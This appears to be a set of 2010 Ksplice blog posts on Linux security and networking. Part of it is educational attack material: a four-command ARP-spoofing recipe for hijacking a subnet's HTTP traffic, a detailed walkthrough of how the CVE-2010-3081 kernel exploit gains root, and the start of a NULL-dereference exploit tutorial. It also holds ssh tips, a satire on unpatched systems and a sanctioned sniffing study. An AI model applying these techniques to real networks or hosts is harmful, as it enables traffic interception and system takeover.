To get the client machines to believe the router is the real gateway, you might have to clear the gateway entry from the ARP cache with arp -d, or bring your interfaces down and back up. I can verify that my TiVo corrected itself quickly without any intervention, but I won't make any promises about your networked devices.

In summary

That was a lot of explanatory text, but the steps required to hijack the HTTP traffic on your home subnet can be boiled down to:

  1. enabled IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
  2. set your routing rule: iptables -t nat -A PREROUTING -p tcp --dport 80 -j NETMAP --to
  3. add the gateway IP address to the appropriate interface: ip addr add dev eth0
  4. ARP for the gateway MAC address: arping -c 3 -A -I eth0

substituting the appropriate IP address and interface information and tearing down when you're done.

And that's all there is to it!

This has been tested as working in a few environments, but it might not work in yours. I'd love to hear the details on if this works, works with modifications, or doesn't work (because the devices are being too clever about Gratuitous ARPs, or otherwise) in the comments.

--> Huge thank-you to fellow experimenter adamf. <---


Wednesday Sep 22, 2010

Anatomy of an exploit: CVE-2010-3081

It has been an exciting week for most people running 64-bit Linux systems. Shortly after "Ac1dB1tch3z" released his or her exploit of the vulnerability known as CVE-2010-3081, we saw this exploit aggressively compromising machines, with reports of compromises all over the hosting industry and many machines using our diagnostic tool and testing positive for the backdoors left by the exploit.

The talk around the exploit has mostly been panic and mitigation, though, so now that people have had time to patch their machines and triage their compromised systems, what I'd like to do for you today is talk about how this bug worked, how the exploit worked, and what we can learn about Linux security.

The Ingredients of an Exploit

There are three basic ingredients that typically go into a kernel exploit: the bug, the target, and the payload. The exploit triggers the bug -- a flaw in the kernel -- to write evil data corrupting the target, which is some kernel data structure. Then it prods the kernel to look at that evil data and follow it to run the payload, a snippet of code that gives the exploit the run of the system.

The bug is the one ingredient that is unique to a particular vulnerability. The target and the payload may be reused by an attacker in exploits for other vulnerabilities -- if 'Ac1dB1tch3z' didn't copy them already from an earlier exploit, by himself or by someone else, he or she will probably reuse them in future exploits.

Let's look at each of these in more detail.

The Bug: CVE-2010-3081

An exploit starts with a bug, or vulnerability, some kernel flaw that allows a malicious user to make a mess -- to write onto its target in the kernel. This bug is called CVE-2010-3081, and it allows a user to write a handful of words into memory almost anywhere in the kernel.

The bug was present in Linux's 'compat' subsystem, which is used on 64-bit systems to maintain compatibility with 32-bit binaries by providing all the system calls in 32-bit form. Now Linux has over 300 different system calls, so this was a big job. The Linux developers made certain choices in order to keep the task manageable:

  • We don't want to rewrite the code that actually does the work of each system call, so instead we have a little wrapper function for compat mode.
  • The wrapper function needs to take arguments from userspace in 32-bit form, then put them in 64-bit form to pass to the code that does the system call's work. Often some arguments are structs which are laid out differently in the 32-bit and 64-bit worlds, so we have to make a new 64-bit struct based on the user's 32-bit struct.
  • The code that does the work expects to find the struct in the user's address space, so we have to put ours there. Where in userspace can we find space without stepping on toes? The compat subsystem provides a function to find it on the user's stack.
Now, here's the core problem. That allocation routine went like this:
  static inline void __user *compat_alloc_user_space(long len)
          struct pt_regs *regs = task_pt_regs(current);
          return (void __user *)regs->sp - len;
The way you use it looks a lot like the old familiar malloc(), or the kernel's kmalloc(), or any number of other memory-allocation routines: you pass in the number of bytes you need, and it returns a pointer where you are supposed to read and write that many bytes to your heart's content. But it comes -- came -- with a special catch, and it's a big one: before you used that memory, you had to check that it was actually OK for the user to use that memory, with the kernel's access_ok() function. If you've ever helped maintain a large piece of software, you know it's inevitable that someone will eventually be fooled by the analogy, miss the incongruence, and forget that check.

Fortunately the kernel developers are smart and careful people, and they defied that inevitability almost everywhere. Unfortunately, they missed it in at least two places. One of those is this bug. If we call getsockopt() in 32-bit fashion on the socket that represents a network connection over IP, and pass an optname of MCAST_MSFILTER, then in a 64-bit kernel we end up in compat_mc_getsockopt():

  int compat_mc_getsockopt(struct sock *sock, int level, int optname,
          char __user *optval, int __user *optlen,
          int (*getsockopt)(struct sock *,int,int,char __user *,int __user *))
This function calls compat_alloc_user_space(), and it fails to check the result is OK for the user to access -- and by happenstance the struct it's making room for has a variable length, supplied by the user.

So the attacker's strategy goes like so:

  • Make an IP socket in a 32-bit process, and call getsockopt() on it with optname MCAST_MSFILTER. Pass in a giant length value, almost the full possible 2GB. Because compat_alloc_user_space() finds space by just subtracting the length from the user's stack pointer, with a giant length the address wraps around, down past zero, to where the kernel lives at the top of the address space.
  • When the bug fires, the kernel will copy the original struct, which the attacker provides, into the space it has just 'allocated', starting at that address up in kernel-land. So fill that struct with, say, an address for evil code.
  • Tune the length value so that the address where the 'new struct' lives is a particularly interesting object in the kernel, a target.
The fix for CVE-2010-3081 was to make compat_alloc_user_space() call access_ok() to check for itself.

More technical details are ably explained in the original report by security researcher Ben Hawkes, who brought the vulnerability to light.

The Target: Function Pointers Everywhere

The target is some place in the kernel where if we make the right mess, we can leverage that into the kernel running the attacker's code, the payload. Now the kernel is full of function pointers, because secretly it's object oriented. So for example the attacker may poke some userspace object like a special file to cause the kernel to invoke a certain method on it -- and before doing so will target that method's function pointer in the object's virtual method table (called an "ops struct" in kernel lingo) which says where to find all the methods, scribbling over it with the address of the payload.

A key constraint for the attacker is to pick something that will never be used in normal operation, so that nothing goes awry to catch the user's attention. This exploit uses one of three targets: the interrupt descriptor table, timer_list_fops, and the LSM subsystem.

  • The interrupt descriptor table (IDT) is morally a big table of function pointers. When an interrupt happens, the hardware looks it up in the IDT, which the kernel has set up in advance, and calls the handler function it finds there. It's more complicated than that because each entry in the table also needs some metadata to say who's allowed to invoke the interrupt, whether the handler should be called with user or kernel privileges, etc. This exploit picks interrupt number 221, higher than anybody normally uses, and carefully sets up that entry in the IDT so that its own evil code is the handler and runs in kernel mode. Then with the single instruction int $221, it makes that interrupt happen.
  • timer_list_fops is the "ops struct" or virtual method table for a special file called /proc/timer_list. Like many other special files that make up the proc filesystem, /proc/timer_list exists to provide kernel information to userspace. This exploit scribbles on the pointer for the poll method, which is normally not even provided for this file (so it inherits a generic behavior), and which nobody ever uses. Then it just opens that file and calls poll(). I believe this could just as well have been almost any file in /proc/.
  • The LSM approach attacks several different ops structs of type security_operations, the tables of methods for different 'Linux security modules'. These are gigantic structs with hundreds of function pointers; the one the exploit targets in each struct is msg_queue_msgctl, the 100th one. Then it issues a msgctl system call, which causes the kernel to check whether it's authorized by calling the msg_queue_msgctl method... which is now the exploit's code.
Why three different targets? One is enough, right? The answer is flexibility. Some kernels don't have timer_list_fops. Some kernels have it, but don't make available a symbol to find its address, and the address will vary from kernel to kernel, so it's tricky to find. Other kernels pose the same obstacle with the security_operations structs, or use a different security_operations than the ones the exploit corrupts. Different kernels offer different targets, so a widely applicable exploit has to have several targets in its repertoire. This one picks and chooses which one to use depending on what it can find.

The Payload: Steal Privileges

Finally, once the bug is used to corrupt the target and the target is triggered, the kernel runs the attacker's payload, or shellcode. A simple exploit will run the bare minimum of code inside the kernel, because it's much easier to write code that can run in userspace than in kernelspace -- so it just sets the process up to have the run of the system, and then returns.

This means setting the process's user ID to 0, root, so that everything else it does is with root privileges. A process's user ID is stored in different places in different kernel versions -- the system became more complicated in 2.6.29, and again in 2.6.30 -- so the exploit needs to have flexibility again. This one checks the version with uname and assembles the payload accordingly.

This exploit can also clear a couple of flags to turn off SELinux, with code it optionally includes in the payload -- more flexibility. Then it lets the kernel return to userspace, and starts a root shell.

In a real attack, that root shell might be used to replace key system binaries, steal data, start a botnet daemon, or install backdoors on disk to cement the attacker's control and hide their presence.

Flexibility, or, You Can't Trust a Failing Exploit

All the points of flexibility in this exploit illustrate a key lesson: you can't determine you're vulnerable just because an exploit fails. For example, on a Fedora 13 system, this exploit errors out with a message like this:
  $ ./ABftw
  Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
  $$$ Kallsyms +r
  $$$ K3rn3l r3l3as3:
  !!! Err0r 1n s3tt1ng cr3d sh3llc0d3z 
Sometimes a system administrator sees an exploit fail like that and concludes they're safe. "Oh, Red Hat / Debian / my vendor says I'm vulnerable", they may say. "But the exploit doesn't work, so they're just making stuff up, right?"

Unfortunately, this can be a fatal mistake. In fact, the machine above is vulnerable. The error message only comes about because the exploit can't find the symbol per_cpu__current_task, whose value it needs in the payload; it's the address at which to find the kernel's main per-process data structure, the task_struct. But a skilled attacker can find the task_struct without that symbol, by following pointers from other known data structures in the kernel.

In general, there is almost infinitely much work an exploit writer could put in to make the exploit function on more and more kernels. Use a wider repertoire of targets; find missing symbols by following pointers or by pattern-matching in the kernel; find missing symbols by brute force, with a table prepared in advance; disable SELinux, as this exploit does, or grsecurity; or add special code to navigate the data structures of unusual kernels like OpenVZ. If the bug is there in a kernel but the exploit breaks, it's only a matter of work or more work to extend the exploit to function there too.

That's why the only way to know that a given kernel is not affected by a vulnerability is a careful examination of the bug against the kernel's source code and configuration, and never to rely on a failing exploit -- and even that examination can sometimes be mistakenly optimistic. In practice, for a busy system administrator this means that when the vendor recommends you update, the only safe choice is to update.


Friday Sep 17, 2010


Hi. I'm the original developer of Ksplice and the CEO of the company. Today is one of those days that reminds me why I created Ksplice.

I'm writing this blog post to provide some information and assistance to anyone affected by the recent Linux kernel vulnerability CVE-2010-3081, which unfortunately is just about everyone running 64-bit Linux. To make matters worse, in the last day we've received many reports of people attacking production systems using an exploit for this vulnerability, so if you run Linux systems, we recommend that you strongly consider patching this vulnerability. (Linux vendors release important security updates every month, but this vulnerability is particularly high profile and people are using it aggressively to exploit systems).

This vulnerability was introduced into the Linux kernel in April 2008, and so essentially every distribution is affected, including RHEL, CentOS, Debian, Ubuntu, Parallels Virtuozzo Containers, OpenVZ, CloudLinux, and SuSE, among others. A few vendors have released kernels that fix the vulnerability if you reboot, but other vendors, including Red Hat, are still working on releasing an updated kernel.

The published workarounds that we've seen, including the workaround recommended by Red Hat, can themselves be worked around by an attacker to still exploit the system. For now, to be responsible and avoid helping attackers, we don't want to provide those technical details publicly; we've contacted Red Hat and other vendors with the details and we'll cover them in a future blog post, in a few weeks.

Although it might seem self-serving, I do know of one sure way to fix this vulnerability right away on running production systems, and it doesn't even require you to reboot: you can (for free) download Ksplice Uptrack and fully update any of the distributions that we support (We support RHEL, CentOS, Debian, Ubuntu, Parallels Virtuozzo Containers, OpenVZ, and CloudLinux. For high profile updates like this one, Ksplice optionally makes available an update for your distribution before your distribution officially releases a new kernel). We provide a free 30-day trial of Ksplice Uptrack on our website, and you can use this free trial to protect your systems, even if you cannot arrange to reboot anytime soon. It's the best that we can do to help in this situation, and I hope that it's useful to you.

Note: If an attacker has already compromised one of your machines using an exploit for CVE-2010-3081, simply updating the system will not eliminate the presence of an attacker. Similarly, if a machine has already been exploited, then the exploit may continue working on that system even after it has been updated, because of a backdoor that the exploit installs. We've published a test tool to check whether your system has already been compromised by the public CVE-2010-3081 exploit code that we've seen. If one or more of your machines has already been compromised by an attacker, we recommend that you use your normal procedure for dealing with that situation.


Monday Jul 26, 2010

Six things I wish Mom told me (about ssh)

If you've ever seriously used a Linux system, you're probably already familiar with at least the basics of ssh. But you're hungry for more. In this post, we'll show you six ssh tips that'll help take you to the next level. (We've also found that they make for excellent cocktail party conversation talking points.)

(1) Take command!

Everyone knows that you can use ssh to get a remote shell, but did you know that you can also use it to run commands on their own? Well, you can--just stick the command name after the hostname! Case in point:

wdaher@rocksteady:~$ ssh bebop uname -a
Linux bebop 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 05:14:15 UTC 2010 x86_64 GNU/Linux

Combine this with passwordless ssh logins, and your shell scripting powers have just leveled up. Want to figure out what version of Python you have installed on each of your systems? Just stick ssh hostname python -V in a for loop, and you're done!

Some commands, however, don't play along so nicely:

wdaher@rocksteady:~$ ssh bebop top
TERM environment variable not set.

What gives? Some programs need a pseudo-tty, and aren't happy if they don't have one (anything that wants to draw on arbitrary parts of the screen probably falls into this category). But ssh can handle this too--the -t option will force ssh to allocate a pseudo-tty for you, and then you'll be all set.

# Revel in your process-monitoring glory
wdaher@rocksteady:~$ ssh bebop -t top
# Or, resume your session in one command, if you're a GNU Screen user
wdaher@rocksteady:~$ ssh bebop -t screen -dr

(2) Please, try a sip of these ports

But wait, there's more! ssh's ability to forward ports is incredibly powerful. Suppose you have a web dashboard at work that runs at analytics on port 80 and is only accessible from the inside the office, and you're at home but need to access it because it's 2 a.m. and your pager is going off.

Fortunately, you can ssh to your desktop at work, desktop, which is on the same network as analytics. So if we can connect to desktop, and desktop can connect to analytics, surely we can make this work, right?

Right. We'll start out with something that doesn't quite do what we want:

wdaher@rocksteady:~$ ssh desktop -L 8080:desktop:80

OK, the ssh desktop is the straightforward part. The -L port:hostname:hostport option says "Set up a port forward from port (in this case, 8080) to hostname:hostport (in this case, desktop:80)."

So now, if you visit http://localhost:8080/ in your web browser at home, you'll actually be connected to port 80 on desktop. Close, but not quite! Remember, we wanted to connect to the web dashboard, running on port 80, on analytics, not desktop.

All we do, though, is adjust the command like so:

wdaher@rocksteady:~$ ssh desktop -L 8080:analytics:80

Now, the remote end of the port forward is analytics:80, which is precisely where the web dashboard is running. But wait, isn't analytics behind the firewall? How can we even reach it? Remember: this connection is being set up on the remote system (desktop), which is the only reason it works.

If you find yourself setting up multiple such forwards, you're probably better off doing something more like:

wdaher@rocksteady:~$ ssh -D 8080 desktop

This will set up a SOCKS proxy at localhost:8080. If you configure your browser to use it, all of your browser traffic will go over SSH and through your remote system, which means you could just navigate to http://analytics/ directly.

(3) Til-de do us part

Riddle me this: ssh into a system, press Enter a few times, and then type in a tilde. Nothing appears. Why?

Because the tilde is ssh's escape character. Right after a newline, you can type ~ and a number of other keystrokes to do interesting things to your ssh connection (like give you 30 extra lives in each continue.) ~? will display a full list of the escape sequences, but two handy ones are ~. and ~^Z.

~. (a tilde followed by a period) will terminate the ssh connection, which is handy if you lose your network connection and don't want to wait for your ssh session to time out.  ~^Z (a tilde followed by Ctrl-Z) will put the connection in the background, in case you want to do something else on the host while ssh is running. An example of this in action:

wdaher@rocksteady:~$ ssh bebop
wdaher@bebop:~$ sleep 10000
wdaher@bebop:~$ ~^Z [suspend ssh]

[1]+  Stopped                 ssh bebop
wdaher@rocksteady:~$ # Do something else
wdaher@rocksteady:~$ fg # and you're back!

(4) Dusting for prints

I'm sure you've seen this a million times, and you probably just type "yes" without thinking twice:

wdaher@rocksteady:~$ ssh bebop
The authenticity of host 'bebop (' can't be established.
RSA key fingerprint is a2:6d:2f:30:a3:d3:12:9d:9d:da:0c:a7:a4:60:20:68.
Are you sure you want to continue connecting (yes/no)?

What's actually going on here? Well, if this is your first time connecting to bebop, you can't really tell whether the machine you're talking to is actually bebop, or just an impostor pretending to be bebop. All you know is the key fingerprint of the system you're talking to.  In principle, you're supposed to verify this out-of-band (i.e. call up the remote host and ask them to read off the fingerprint.)

Let's say you and your incredibly security-minded friend actually want to do this. How does one actually find this fingerprint? On the remote host, have your friend run:

sbaker@bebop:~$ ssh-keygen -l -f /etc/ssh/
2048 a2:6d:2f:30:a3:d3:12:9d:9d:da:0c:a7:a4:60:20:68 /etc/ssh/ (RSA)

Tada! They match, and it's safe to proceed. From now on, this is stored in your list of ssh "known hosts" (in ~/.ssh/known_hosts), so you don't get the prompt every time. And if the key ever changes on the other end, you'll get an alert--someone's trying to read your traffic! (Or your friend reinstalled their system and didn't preserve the key.)

(5) Losing your keys

Unfortunately, some time later, you and your friend have a falling out (something about Kirk vs. Picard), and you want to remove their key from your known hosts. "No problem," you think, "I'll just remove it from my list of known hosts." You open up the file and are unpleasantly surprised: a jumbled file full of all kinds of indecipherable characters. They're actually hashes of the hostnames (or IP addresses) that you've connected to before, and their associated keys.

Before you proceed, surely you're asking yourself: "Why would anyone be so cruel? Why not just list the hostnames in plain text, so that humans could easily edit the file?" In fact, that's actually how it was done until very recently. But it turns out that leaving them in the clear is a potential security risk, since it provides an attacker a convenient list of other places you've connected (places where, e.g., an unwitting user might have used the same password).

Fortunately, ssh-keygen -R <hostname> does the trick:

wdaher@rocksteady:~$ ssh-keygen -R bebop
/home/wdaher/.ssh/known_hosts updated.
Original contents retained as /home/wdaher/.ssh/known_hosts.old

I'm told there's still no easy way to remove now-bitter memories of your friendship together, though.

(6) A connection by any other name...

If you've read this far, you're an ssh pro. And like any ssh pro, you log into a bajillion systems, each with their own usernames, ports, and long hostnames. Like your accounts at AWS, Rackspace Cloud, your dedicated server, and your friend's home system.

And you already know how to do this. username@host or -l username to specify your username, and -p portnumber to specify the port:

wdaher@rocksteady:~$ ssh -p 2222
wdaher@rocksteady:~$ ssh -p 8183
wdaher@rocksteady:~$ ssh -p 31337 -l waseemio

But this gets really old really quickly, especially when you need to pass a slew of other options for each of these connections. Enter .ssh/config, a file where you specify convenient aliases for each of these sets of settings:

Host bob
    Port 2222
    User wdaher

Host alice
    Port 8183
    User waseem

Host self
    Port 31337
    User waseemio

So now it's as simple as:

wdaher@rocksteady:~$ ssh bob
wdaher@rocksteady:~$ ssh alice
wdaher@rocksteady:~$ ssh self
And yes, the config file lets you specify port forwards or commands to run as well, if you'd like--check out the ssh_config manual page for the details.

ssh! It's (not) a secret

This list is by no means exhaustive, so I turn to you: what other ssh tips and tricks have you learned over the years? Leave ’em in the comments!


Wednesday Jun 30, 2010

Let's Play Vulnerability Bingo!

Dear Fellow System Administrators,

I like excitement in my life. I go on roller coasters, I ride my bike without a helmet, I make risky financial decisions. I treat my servers no differently. When my Linux vendor releases security updates, I think: I could apply these patches, but why would I? If I did, I'd have to coordinate with my users to schedule a maintenance window for 2am on a Sunday and babysit those systems while they reboot, which is seriously annoying, hurts our availability, and interrupts my beauty sleep (and trust me, I need my beauty sleep). Plus, where's the fun in having a fully-patched system? Without open vulnerabilities, how else would I have won a ton of money in my office's Vulnerability Bingo games?

vulnerability bingo card

How can I get in on some Vulnerability Bingo action, you ask? Simple: get yourself some bingo cards, be sure not to patch your systems, and place chips on appropriate squares when your machines are compromised. Or, as a fun variant, place chips when your friends' machines get compromised! For the less adventurous, place chips as relevant Common Vulnerabilities and Exposures are announced.

What's really great is the diversity of vulnerabilities. In 2009 alone, Vulnerability Bingo featured:

physically proximate denial of service attacks (CVE-2009-1046).

local denial of service attacks (CVE-2009-0322, CVE-2009-0031, CVE-2009-0269, CVE-2009-1242, CVE-2009-2406, CVE-2009-2407, CVE-2009-2287, CVE-2009-2692, CVE-2009-2909, CVE-2009-2908, CVE-2009-3290, CVE-2009-3547, CVE-2009-3621, CVE-2009-3620) coming in at least 5 great flavors: faults, memory corruption, system crashes, hangs, and the kernel OOPS!

And the perennial favorite, remote denial of service attacks (CVE-2009-1439, CVE-2009-1633, CVE-2009-3613, CVE-2009-2903) including but not limited to system crashes, IOMMU space exhaustion, and memory consumption!

How about leaking potentially sensitive information from kernel memory (CVE-2009-0676, CVE-2009-3002, CVE-2009-3612, CVE-2009-3228) and remote access to potentially sensitive information from kernel memory (CVE-2009-1265)?

Perhaps I can interest you in some privilege escalation (CVE-2009-2406, CVE-2009-2407, CVE-2009-2692, CVE-2009-3547, CVE-2009-3620), or my personal favorites, arbitrary code execution (CVE-2009-2908) and unknown impact (CVE-2009-0065, CVE-2009-1633, CVE-2009-3638).

Sometimes you get a triple threat like CVE-2009-1895, which "makes it easier for local users to leverage the details of memory usage to (1) conduct NULL pointer dereference attacks, (2) bypass the mmap_min_addr protection mechanism, or (3) defeat address space layout randomization (ASLR)". Three great tastes that taste great together -- and a great multi-play Bingo opportunity!

Linux vendors release kernel security updates almost every month (take Red Hat for example), so generate some cards and get in on the action before you miss the next round of exciting CVEs!

Happy Hacking,

Ben Bitdiddle
System Administrator
HackMe Inc.


Wednesday May 19, 2010

The wireless traffic of MIT students

Wireless traffic is both interesting and delightfully accessible thanks to the broadcast nature of 802.11. I have spent many a lazy weekend afternoon watching my laptop, the Tivo, and the router chatting away in a Wireshark window.

As fun as the wireless traffic in one's house may be, there's something to be said for being able to observe a much larger ecosystem - one with more people with a more diverse set of operating systems, browsers, and intentions as they work on their wireless-enabled devices, giving rise to more interesting background and active traffic patterns and a greater set of protocols in play.

Now, it happens to be the case that sniffing other people's wireless traffic breaks a number of federal and local laws, including wiretapping laws, and while I am interested in observing other people's wireless traffic, I'm not interested in breaking the law. Fortunately, Ksplice is down the road from a wonderful school that fosters this kind of intellectual curiosity.

I met with MIT's Information Services and Technology Security Team, and we came up with a plan for me to gather data that would satisfy MIT's Athena Rules of Use. I got permission from Robert Morris and Sam Madden to monitor the wireless traffic during their Computer Systems Engineering class and made an announcement at the beginning of a class period explaining what I'd be doing. Somewhat ironically, that day's lecture was an introduction to computer security.

Some interesting results from the data set collected are summarized below. Traffic was gathered with tcpdump on my laptop as I sat in the middle of the classroom. The data was imported into Wireshark, spit back out as a CSV, and imported into a sqlite database for aggregation queries, read back into tcpdump and filtered there, or hacked up with judicious use of grep, as different needs arose.

Protocol # Packets % Packets
MDNS 259932 30.46
TCP 245268 28.74
ICMPv6 116167 13.61
TPKT 78311 9.18
SSDP 31441 3.68
HTTP 28027 3.28
UDP 17006 1.99
LLMNR 16991 1.99
TLSv1 14390 1.69
DHCPv6 11572 1.36
DNS 10870 1.27
SSH 8804 1.03
SSLv3 3094 0.36
Jabber 2507 0.29
ARP 2003 0.23
SSHv2 1503 0.18
IGMP 1309 0.15
SNMP 1232 0.14
NBNS 619 0.073
WLCCP 513 0.060
AIM Buddylist 265 0.031
NTP 245 0.029
HTTP/XML 218 0.026
MSNMS 192 0.022
IP 139 0.016
AIM 121 0.014
SSL 105 0.012
IPv6 90 0.011
AIM Generic 84 0.0098
DHCP 64 0.0075
ICMP 60 0.0070
X.224 59 0.0069
AIM SST 45 0.0053
AIM Messaging 39 0.0046
BROWSER 37 0.0043
YMSG 35 0.0041
AARP 18 0.0021
OCSP 16 0.0019
AIM SSI 11 0.0013
SSLv2 8 0.00094
T.125 5 0.00059
AIM Signon 4 0.00047
NBP 4 0.00047
AIM BOS 3 0.00035
AIM ChatNav 3 0.00035
AIM Stats 3 0.00035
AIM Location 2 0.00023
ZIP 2 0.00023

Basic statistics
Time spent capturing: 45 minutes
Packets captured: 853436
Number of traffic sources in the room: 21
Number of distinct source and destination IPv4 and IPv6 addresses: 5117
Number of "active" traffic addresses (eg using HTTP, SSH, not background traffic): 581
Number of protocols represented: 48 (note that Wireshark buckets based on the top layer for a packet, so for example TCP is in this count because someone was sending actual TCP traffic without an application layer on top and not because TCP is the transport protocol for HTTP, which is also in this count). These protocols and how much traffic was sent over them are in the table on the left.

IPv4 v. IPv6
Number of IPv4 packets: 580547
Number of IPv6 packets: 270351

2.15 IPv4 packets were sent for every IPv6 packet. IPv6 was only used for background traffic, serving as the internet layer for the following protocols: DHCPv6, DNS, ICMPv6, LLMNR, MDNS, SSDP, TCP, and UDP. The TCP over IPv6 packets were all icslap, ldap, or wsdapi communications between our Windows user discussed below and his or her remote desktop. The UDP over IPv6 packets were all ws-discovery communications, part of a local multicast discovery protocol most likely being used by the Windows machines in the room.

Number of ICMP packets: 60
Number of ICMPv6 packets: 116167

1936.12 ICMPv6 packets were sent for every ICMP packet. The reason is that ICMPv6 is doing IPv6 work that is taken care of by other link layer protocols in IPv4. Looking at the ICMP and ICMPv6 packets by type:

ICMP Type/Code Pkts
Dest unreachable (Host administratively prohibited) 1
Dest unreachable (Port unreachable) 35
Echo (ping) request 9
Time-to-live exceeded in transit 15

ICMPv6 Type/Code Pkts
Echo request 8
Multicast Listener Report msg v2 7236
Multicast listener done 86
Multicast listener report 548
Neighbor advertisement 806
Neighbor solicitation 105710
Redirect 353
Router advertisement 461
Router solicitation 956
Time exceeded (In-transit) 1
Unknown (0x40) (Unknown (0x87)) 1
Unreachable (Port unreachable) 1

These ICMPv6 packets are mostly doing Neighbor Discover Protocol (NDP) and Multicast Listener Discovery (MLD) work. NDP handles router and neighbor solicitation and is similar to ARP and ICMP under IPv4, and MLD handles multicast listener discovery similar to IGMP under IPv4.

Number of TCP packets: 383122
Number of UDP packets: 350067

1.09 TCP packets were sent for every UDP packet. I would have thought TCP would be a clear winner, but given that MDNS traffic, which is over UDP, makes up over 30% of the packets captured, I guess this isn't surprising. The 14% of packets unaccounted for at the transport layer are mostly ARP and ICMP traffic. See also this post.

Instant Messenging

Awesomely, AIM, Jabber, MSN Messenger, and Yahoo! Messenger were all represented in the traffic:

Participants # Packets
AIM 22 580
Jabber 6 2507
YMSG 4 35
MSNMS 3 192

AIM is the clear favorite (at least with this small sample size). Note that Jabber has about 1/4th the AIM participants but 4x the number of packets. Either the Jabberers are extra chatty, or the fact that Jabber is an XML-based protocol inflates the size of a conversation dramatically on the wire. Note that some IM traffic (like Google Chat) might have instead been bucketed as HTTP/XML by Wireshark.

That Windows Remote Desktop Person

119489 packets, or 14% of the traffic, were between a computer in the classroom and what is with high probability a Windows machine on campus running the Microsoft Remote Desktop Protocol (see also this support page for a discussion of the protocol specifics).

RDP traffic from client to remote desktop: T.125, TCP, TPKT, X.224
RDP traffic from remote desktop to client: TCP, TPKT

Most of the traffic is T.125 payload packets. TPKTs encapulate transport protocol data units (TPDUs) in the ISO Transport Service on top of TCP. TPKT traffic was all "Continuation" traffic. X.224 transmits status and error codes. TCP "ms-wbt-server" traffic to port 3389 on the remote machine seals the deal on this being an RDP setup.


All SSH and SSHv2 traffic was to Linerva, a public-access Linux server run by SIPB for the MIT community, except for one person talking to a personal server on campus.

Protocol # Packets % Packets
TLSv1 14390 81.8
SSLv3 3094 17.6
SSL 105 .59
SSLv2 8 .045

5 clients were involved with negotiations with SSLv2, which is insecure and disabled by default on most browsers and never got past a "Client Hello".


I wanted to be able to answer questions like "what were the top 20 most visited website" in this traffic capture. The proliferation of content distribution networks makes it harder to track all traffic associated with a popular website by IP addresses or hostnames. I ended up doing a crude but quick grep "Host:" pcap.plaintext | sort | uniq -c | sort -n -r on the expanded plaintext version of the data exported from Wireshark, which gives the most visited hosts based on the number of GET requests. The top 20 most visited hosts by that method were:

Rank GETs Host Rank GETs Host
1 336 11 88
2 229 12 87
3 211 13 66
4 167 14 66
5 149 15 64
6 114 16 61
7 113 17 57
8 111 18 56
9 93 19 56
10 90 20 55

Alas, pretty boring. The blogcdn, blogsmith and eyewonder hosts are all for Engadget, and fbcdn is part of Facebook. I'll admit that I'd been a little hopeful that some enterprising student would try to screw up my data by scripting visits to a bunch of porn sites or something. CDNs dominate the top 20, and in fact almost all of the roughly 410 web server IP addresses gathered are for CDNs. Akamai led with 39 distinct IPs, followed by Amazon AWS with 23, and Facebook and Panther CDN with 16, with many more at lower numbers.


Using the Internet means a lot more than HTTP traffic! 45 minutes of traffic capture gave us 48 protocols to explore. Most of the captured traffic was background traffic, and in particular discovery traffic local to the subnet.

Sniffing wireless traffic (legally) is a great way to learn about networking protocols and the way the Internet works in practice. It can also be incredibly useful for debugging networking problems.

What are some of your fun or awful networking experiences?


Monday Apr 12, 2010

Much ado about NULL: Exploiting a kernel NULL dereference

Last time, we took a brief look at virtual memory and what a NULL pointer really means, as well as how we can use the mmap(2) function to map the NULL page so that we can safely use a NULL pointer. We think that it's important for developers and system administrators to be more knowledgeable about the attacks that black hats regularly use to take control of systems, and so, today, we're going to start from where we left off and go all the way to a working exploit for a NULL pointer dereference in a toy kernel module.

A quick note: For the sake of simplicity, concreteness, and conciseness, this post, as well as the previous one, assumes Intel x86 hardware throughout. Most of the discussion should be applicable elsewhere, but I don't promise any of the details are the same.


In order to allow you play along at home, I've prepared a trivial kernel module that will deliberately cause a NULL pointer derefence, so that you don't have to find a new exploit or run a known buggy kernel to get a NULL dereference to play with. I'd encourage you to download the source and follow along at home. If you're not familiar with building kernel modules, there are simple directions in the README. The module should work on just about any Linux kernel since 2.6.11.

Don't run this on a machine you care about – it's deliberately buggy code, and will easily crash or destabilize the entire machine. If you want to follow along, I recommend spinning up a virtual machine for testing.

While we'll be using this test module for demonstration, a real exploit would instead be based on a NULL pointer dereference somewhere in the core kernel (such as last year's sock_sendpage vulnerability), which would allow an attacker to trigger a NULL pointer dereference -- much like the one this toy module triggers -- without having to load a module of their own or be root.

If we build and load the nullderef module, and execute

echo 1 > /sys/kernel/debug/nullderef/null_read

our shell will crash, and we'll see something like the following on the console (on a physical console, out a serial port, or in dmesg):

BUG: unable to handle kernel NULL pointer dereference at 00000000

IP: [<c5821001>] null_read_write+0x1/0x10 [nullderef]

The kernel address space

e We saw last time that we can map the NULL page in our own application. How does this help us with kernel NULL dereferences? Surely, if every application has its own address space and set of addresses, the core operating system itself must also have its own address space, where it and all of its code and data live, and mere user programs can't mess with it?

For various reasons, that that's not quite how it works. It turns out that switching between address spaces is relatively expensive, and so to save on switching address spaces, the kernel is actually mapped into every process's address space, and the kernel just runs in the address space of whichever process was last executing.

In order to prevent any random program from scribbling all over the kernel, the operating system makes use of a feature of the x86's virtual memory architecture called memory protection. At any moment, the processor knows whether it is executing code in user (unprivileged) mode or in kernel mode. In addition, every page in the virtual memory layout has a flag on it that specifies whether or not user code is allowed to access it. The OS can thus arrange things so that program code only ever runs in "user" mode, and configures virtual memory so that only code executing in "kernel" mode is allowed to read or write certain addresses. For instance, on most 32-bit Linux machines, in any process, the address 0xc0100000 refers to the start of the kernel's memory – but normal user code is not allowed to read or write it.

A diagram of virtual memory and memory protection
A diagram of virtual memory and memory protection

Since we have to prevent user code from arbitrarily changing privilege levels, how do we get into kernel mode? The answer is that there are a set of entry points in the kernel that expect to be callable from unprivileged code. The kernel registers these with the hardware, and the hardware has instructions that both switch to one of these entry points, and change to kernel mode. For our purposes, the most relevant entry point is the system call handler. System calls are how programs ask the kernel to do things for them. For example, if a programs want to write from a file, it prepares a file descriptor referring to the file and a buffer containing the data to write. It places them in a specified location (usually in certain registers), along with the number referring to the write(2) system call, and then it triggers one of those entry points. The system call handler in the kernel then decodes the argument, does the write, and return to the calling program.

This all has at least two important consequence for exploiting NULL pointer dereferences:

First, since the kernel runs in the address space of a userspace process, we can map a page at NULL and control what data a NULL pointer dereference in the kernel sees, just like we could for our own process!

